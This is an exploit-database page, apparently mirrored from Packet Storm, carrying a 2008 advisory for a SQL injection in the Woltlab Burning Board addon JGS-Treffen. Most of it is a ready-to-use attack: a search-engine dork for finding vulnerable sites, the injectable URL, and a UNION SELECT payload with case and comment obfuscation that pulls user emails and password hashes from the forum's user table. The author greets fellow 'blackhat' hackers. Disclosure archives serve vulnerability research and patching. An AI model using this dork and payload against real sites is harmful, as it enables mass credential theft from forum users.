Lucene search

K

woltlabbbjgs-sql.txt

๐Ÿ—“๏ธย 01 Apr 2008ย 00:00:00Reported byย h0yt3rTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 21ย Views

Woltlab Burning Board Addon JGS-Treffen SQL Injection vulnerabilit

Show more
Code
`######################  
#  
#Woltlab Burning Board Addon JGS-Treffen SQL Injection  
#  
######################  
#  
#Bug by: h0yt3r  
#  
#Dork: inurl:jgs_treffen.php  
#  
##  
###  
##  
#  
#There is a bug in jgs_treffen.php 2.0.2 and lower.  
#It's already fixed in newer Versions...  
#  
#SQL Injection:  
#http://[target]/[path]/jgs_treffen.php?action=ansicht&view_id=[SQL]  
#  
#PoC:  
#jgs_treffen.php?action=ansicht&view_id='-1/**/UnIoN/**/All/**/SeLeCt/**/1,2,CoNcAt(email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/bb1_users/*  
#  
#######################  
#  
#Greetz to ramon, thund3r and all the other dirty blackhat rest xD!  
#  
#######################  
#######################   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report